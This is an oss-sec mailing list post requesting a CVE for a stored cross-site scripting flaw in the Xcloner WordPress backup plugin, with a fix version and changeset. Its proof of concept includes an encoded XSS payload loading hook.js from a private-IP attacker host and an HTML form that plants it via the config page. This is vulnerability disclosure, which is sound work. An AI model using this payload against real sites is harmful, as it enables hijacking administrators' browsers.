oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

CVE request : a stored XSS in Xcloner for wordpress

From: limingxing <limingxing () 360 cn>
Date: Wed, 27 Jul 2016 02:35:46 +0000
Hi

     I found a stored XSS in Xcloner for wordpress.  The XSS filter can 
be bypass.

     Here is the plugin page
     https://wordpress.org/plugins/xcloner-backup-and-restore/

     PoC

     In the "Corn setting" page(URL is 
"http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config"), 
set the "Backup name" (corn_bname) like 
"1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on"

     <html>
         <form 
action="http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config" 
method="post">
             <input type="hidden" name="cron_bname" 
value="1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on" 
/>
             <input type="submit" name="submit">
         </form>
     </html>


     Fix way
     Update to version 3.1.5

     Change

     https://plugins.trac.wordpress.org/changeset/1456784


     Could you assign a CVE ID for it?

Chen Ruiqi
Codesafe Team
Previous By Date Next
Previous By Thread Next

Current thread: